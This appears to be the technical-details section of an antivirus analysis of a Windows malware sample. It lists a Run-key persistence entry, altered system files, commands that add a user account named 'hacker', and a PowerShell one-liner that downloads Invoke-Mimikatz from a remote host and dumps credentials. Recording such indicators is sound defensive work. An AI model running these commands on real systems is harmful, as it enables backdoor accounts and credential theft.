Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegOperate' = 'RegOperate.exe'
- %WINDIR%\winhlp32.exe
- %WINDIR%\Explorer.EXE
- %WINDIR%\testfile.txt
- %WINDIR%\winhlp32.exe.new
- <SYSTEM32>\dllcache\winhlp32.exe.new
- '<SYSTEM32>\cmd.exe' /c net user hacker /add
- '<SYSTEM32>\net.exe' user hacker /add
- '<SYSTEM32>\net1.exe' user hacker /add
- '<SYSTEM32>\cmd.exe' /c powershell IEX(New-Object Net.WebClient).DownLoadString('http://19#.#68.1.39/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds